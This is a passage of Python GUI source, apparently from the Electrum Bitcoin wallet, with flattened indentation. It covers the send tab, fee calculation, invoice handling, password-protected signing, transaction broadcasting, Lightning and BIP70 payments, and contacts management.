if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 3, 4)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_button)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
use_rbf = bool(self.config.get('use_rbf', True))
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setVisible(b)
self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
